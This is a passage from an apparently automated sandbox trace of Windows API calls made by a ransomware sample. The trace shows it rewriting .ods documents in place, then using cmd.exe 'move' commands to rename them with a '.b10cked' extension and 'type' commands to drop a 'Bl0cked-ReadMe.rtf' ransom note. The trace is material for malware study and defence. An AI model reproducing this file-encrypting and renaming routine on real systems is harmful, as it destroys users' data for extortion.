lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\PWKWXR~1.ODS\" \"C:\\Users\\EEBsYm5\\Desktop\\pWkwXr56WJA6 l5.ods.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x110, hThread=0x114, dwProcessId=0xdb0, dwThreadId=0xd48)) returned 1 [0137.555] CloseHandle (hObject=0x110) returned 1 [0137.556] CloseHandle (hObject=0x114) returned 1 [0137.556] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0137.556] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\", cchLength=0x1b | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\") returned 0x1b [0137.556] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount1=25, lpString2="C:\\USERS\\EEBSYM5\\DOCUMENTS\\", cchCount2=27) returned 1 [0137.556] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0137.556] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0137.556] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount1=25, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 2 [0137.556] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0137.556] ReleaseMutex (hMutex=0xf8) returned 1 [0137.556] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0137.556] ReleaseMutex (hMutex=0xf8) returned 1 [0137.556] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0137.556] ReleaseMutex (hMutex=0xf8) returned 1 [0137.556] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0137.556] ReleaseMutex (hMutex=0xf8) returned 1 [0137.556] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\9bQDI69.ods" (normalized: "c:\\users\\eebsym5\\documents\\2w7_ew\\5oweksadhmyqwxms\\9bqdi69.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0137.556] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.556] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x16b0f [0137.556] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.556] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=19434561415) returned 1 [0137.556] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.556] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x16b0f [0137.557] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.557] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.557] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x16b0f [0137.557] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.557] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0137.557] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x16b0f [0137.557] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0137.557] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.557] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x16b0f [0137.557] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.557] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.557] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x16b0f [0137.557] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.557] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.557] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x16b0f [0137.557] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.557] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.557] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x16b0f [0137.557] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.557] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.557] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x16b0f [0137.557] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.557] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.558] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x16b0f [0137.558] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.558] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x16627 [0137.558] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0137.559] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0137.559] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0137.559] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x16b0f [0137.559] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0137.559] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0137.559] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0137.559] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x16b0f [0137.559] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0137.559] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0137.559] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xb586, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xb586, lpOverlapped=0x0) returned 1 [0137.560] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0137.560] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xb586, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0xb586, lpOverlapped=0x0) returned 1 [0137.560] SetFilePointer (in: hFile=0x114, lDistanceToMove=-46470, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xb589 [0137.560] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xb586, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xb586, lpOverlapped=0x0) returned 1 [0137.560] SetFilePointer (in: hFile=0x114, lDistanceToMove=-46470, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xb589 [0137.560] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xb586, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0xb586, lpOverlapped=0x0) returned 1 [0137.565] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="9bQDI69.ods", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0137.565] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="9bQDI69.ods", cchWideChar=11, lpMultiByteStr=0x131322c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="9bQDI69.ods", lpUsedDefaultChar=0x0) returned 11 [0137.565] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x16b0f [0137.565] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0137.565] CloseHandle (hObject=0x114) returned 1 [0137.566] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\9bQDI69.ods", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\9bQDI69.ods") returned 0x35 [0137.566] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\") returned 0x2a [0137.567] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\9bQDI69.ods\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\9bQDI69.ods.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\9bQDI69.ods\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\9bQDI69.ods.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x110, hThread=0x114, dwProcessId=0xd58, dwThreadId=0xd68)) returned 1 [0137.572] CloseHandle (hObject=0x110) returned 1 [0137.572] CloseHandle (hObject=0x114) returned 1 [0137.572] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\", cchLength=0x33 | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\") returned 0x33 [0137.572] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\", cchLength=0x1b | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\") returned 0x1b [0137.572] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\", cchCount1=51, lpString2="C:\\USERS\\EEBSYM5\\DOCUMENTS\\", cchCount2=27) returned 3 [0137.572] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\", cchLength=0x33 | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\") returned 0x33 [0137.572] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0137.572] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\", cchCount1=51, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 3 [0137.572] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF") returned 0x2d [0137.573] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\"", cchLength=0x20 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\"") returned 0x20 [0137.573] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0137.573] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\") returned 0x2a [0137.573] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"[TO_PATH]\"", cchLength=0x42 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\BL0CKE~1.RTF\" > \"[TO_PATH]\"") returned 0x42 [0137.573] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0137.573] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\Bl0cked-ReadMe.rtf\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb94*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb84 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\Bl0cked-ReadMe.rtf\"", lpProcessInformation=0x12fb84*(hProcess=0x110, hThread=0x114, dwProcessId=0xd7c, dwThreadId=0xd70)) returned 1 [0137.603] CloseHandle (hObject=0x110) returned 1 [0137.603] CloseHandle (hObject=0x114) returned 1 [0137.603] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\documents\\2w7_ew\\5oweksadhmyqwxms\\bl0cked-readme.rtf")) returned 0x20 [0137.603] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0137.603] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0137.603] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0137.604] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0137.604] ReleaseMutex (hMutex=0xf8) returned 1 [0137.604] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0137.604] ReleaseMutex (hMutex=0xf8) returned 1 [0137.604] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0137.604] ReleaseMutex (hMutex=0xf8) returned 1 [0137.604] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0137.604] ReleaseMutex (hMutex=0xf8) returned 1 [0137.604] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\IJFqBHm_BK63v.ods" (normalized: "c:\\users\\eebsym5\\documents\\2w7_ew\\ijfqbhm_bk63v.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0137.604] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.604] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xbd63 [0137.604] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.604] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=19439345553) returned 1 [0137.604] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.604] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xbd63 [0137.604] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.604] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.604] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xbd63 [0137.605] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.605] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0137.605] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0xbd63 [0137.605] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0137.605] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.605] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xbd63 [0137.605] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.605] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.605] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xbd63 [0137.605] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.605] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.605] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xbd63 [0137.605] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.605] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.605] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xbd63 [0137.605] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.605] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.606] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xbd63 [0137.606] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.606] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.606] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xbd63 [0137.606] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) 